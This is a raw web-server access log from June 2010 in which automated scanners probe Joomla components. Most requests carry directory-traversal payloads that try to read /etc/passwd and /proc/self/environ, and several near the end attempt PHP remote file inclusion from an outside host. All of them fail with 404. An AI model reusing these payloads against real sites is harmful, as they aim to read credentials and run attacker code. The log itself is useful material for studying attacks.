217.160.249.213 - - [10/Jun/2010:02:55:52 -0500] "GET /logs//index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
217.160.249.213 - - [10/Jun/2010:02:55:52 -0500] "GET //index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.227.143.132 - - [10/Jun/2010:02:56:16 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
69.16.227.125 - - [10/Jun/2010:02:56:24 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
217.160.249.213 - - [10/Jun/2010:02:56:33 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.160.249.213 - - [10/Jun/2010:02:56:33 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
79.170.45.162 - - [10/Jun/2010:02:56:36 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:02:56:44 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:02:57:03 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:02:57:03 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:02:57:16 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:02:57:25 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:02:57:40 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:02:57:40 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
173.12.72.97 - - [10/Jun/2010:02:58:19 -0500] "GET / HTTP/1.1" 200 1003 "-""Java/1.5.0_06"
79.170.45.162 - - [10/Jun/2010:03:00:15 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:03:00:15 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
91.203.68.45 - - [10/Jun/2010:03:00:32 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:03:00:32 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:03:00:41 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:03:00:41 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
217.73.239.8 - - [10/Jun/2010:03:00:44 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.807"
217.73.239.8 - - [10/Jun/2010:03:00:44 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.807"
89.200.169.108 - - [10/Jun/2010:03:00:51 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:00:52 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:00:54 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:00:54 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:00:54 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:00:54 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:00:55 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:00:55 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:00:55 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:00:55 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:01:02 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:01:02 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:01:05 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:01:05 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.46.195.234 - - [10/Jun/2010:03:01:08 -0500] "GET /logs/access_log.1179878400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.200.169.108 - - [10/Jun/2010:03:01:11 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:01:11 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:01:49 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:01:49 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:01:52 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:01:52 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:01:56 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:01:56 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:02:02 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:02:02 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.30.142.216 - - [10/Jun/2010:03:02:23 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [10/Jun/2010:03:02:23 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
79.170.45.162 - - [10/Jun/2010:03:02:37 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
89.200.169.108 - - [10/Jun/2010:03:02:37 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
79.170.45.162 - - [10/Jun/2010:03:02:37 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
89.200.169.108 - - [10/Jun/2010:03:02:37 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:02:37 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:02:38 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:02:39 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:02:40 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.203.68.45 - - [10/Jun/2010:03:03:07 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:03:03:07 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
217.73.239.8 - - [10/Jun/2010:03:03:28 -0500] "GET /logs/*.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.807"
217.73.239.8 - - [10/Jun/2010:03:03:28 -0500] "GET /*.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.807"
217.73.239.8 - - [10/Jun/2010:03:03:54 -0500] "GET /logs/*.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.807"
217.73.239.8 - - [10/Jun/2010:03:03:54 -0500] "GET /logs/*.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.807"
217.73.239.8 - - [10/Jun/2010:03:03:54 -0500] "GET /*.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.807"
217.73.239.8 - - [10/Jun/2010:03:03:54 -0500] "GET /*.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.807"
217.73.239.8 - - [10/Jun/2010:03:04:31 -0500] "GET /logs/*.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.807"
217.73.239.8 - - [10/Jun/2010:03:04:32 -0500] "GET /*.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.807"
217.73.239.8 - - [10/Jun/2010:03:04:47 -0500] "GET /logs/*.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.807"
217.73.239.8 - - [10/Jun/2010:03:04:47 -0500] "GET /*.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.807"
91.203.68.45 - - [10/Jun/2010:03:04:55 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:03:04:55 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.227.143.132 - - [10/Jun/2010:03:04:59 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
67.227.143.132 - - [10/Jun/2010:03:04:59 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.227.143.132 - - [10/Jun/2010:03:04:59 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
91.203.68.45 - - [10/Jun/2010:03:05:00 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:03:05:01 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.227.143.132 - - [10/Jun/2010:03:05:02 -0500] "GET /logs/access_log.1274572800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
89.200.169.108 - - [10/Jun/2010:03:05:18 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
79.170.45.162 - - [10/Jun/2010:03:05:19 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
89.200.169.108 - - [10/Jun/2010:03:05:19 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
79.170.45.162 - - [10/Jun/2010:03:05:19 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
91.203.68.45 - - [10/Jun/2010:03:05:25 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:03:05:26 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:03:05:26 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
89.200.169.108 - - [10/Jun/2010:03:05:30 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:05:30 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.203.68.45 - - [10/Jun/2010:03:05:31 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:03:05:31 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.200.169.108 - - [10/Jun/2010:03:05:34 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:05:34 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:05:42 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:05:42 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:05:45 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:05:46 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:05:47 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:05:48 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:05:56 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:05:57 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:05:59 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:03:05:59 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.203.68.45 - - [10/Jun/2010:03:06:32 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:03:06:33 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
79.170.45.162 - - [10/Jun/2010:03:07:06 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:03:07:06 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
216.227.215.115 - - [10/Jun/2010:03:07:32 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
216.227.215.115 - - [10/Jun/2010:03:07:33 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
69.16.227.125 - - [10/Jun/2010:03:07:54 -0500] "GET /logs/access_log.1274832000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
69.16.227.125 - - [10/Jun/2010:03:07:54 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
69.16.227.125 - - [10/Jun/2010:03:07:55 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
69.16.227.125 - - [10/Jun/2010:03:07:58 -0500] "GET /logs/access_log.1274572800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
69.147.241.196 - - [10/Jun/2010:03:08:17 -0500] "GET /logs//index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
69.147.241.196 - - [10/Jun/2010:03:08:17 -0500] "GET //index.php?option=com_awdwall&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
218.146.255.196 - - [10/Jun/2010:03:10:31 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
218.146.255.196 - - [10/Jun/2010:03:10:31 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
218.146.255.196 - - [10/Jun/2010:03:10:32 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
202.130.32.50 - - [10/Jun/2010:03:10:36 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
202.130.32.50 - - [10/Jun/2010:03:10:36 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.46.204.194 - - [10/Jun/2010:03:10:41 -0500] "GET /logs/access_log.1209168000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [10/Jun/2010:03:11:30 -0500] "GET /logs/access_log.1229212800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.146.255.196 - - [10/Jun/2010:03:12:09 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
79.170.45.162 - - [10/Jun/2010:03:12:29 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:03:12:29 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:03:13:02 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:03:13:03 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:03:14:36 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:03:14:37 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
217.73.239.8 - - [10/Jun/2010:03:15:02 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.807"
217.73.239.8 - - [10/Jun/2010:03:15:02 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.807"
217.73.239.8 - - [10/Jun/2010:03:15:07 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.807"
217.73.239.8 - - [10/Jun/2010:03:15:07 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.807"
89.31.116.11 - - [10/Jun/2010:03:16:03 -0500] "GET /*.php?option=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
89.31.116.11 - - [10/Jun/2010:03:16:05 -0500] "GET /*.php?option=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.832"
75.136.121.230 - - [10/Jun/2010:03:16:10 -0500] "GET /logs/access_log.1263081600//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
75.136.121.230 - - [10/Jun/2010:03:16:10 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
75.136.121.230 - - [10/Jun/2010:03:16:10 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
79.170.45.162 - - [10/Jun/2010:03:16:48 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:03:16:48 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
75.136.121.230 - - [10/Jun/2010:03:17:01 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/111/id1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
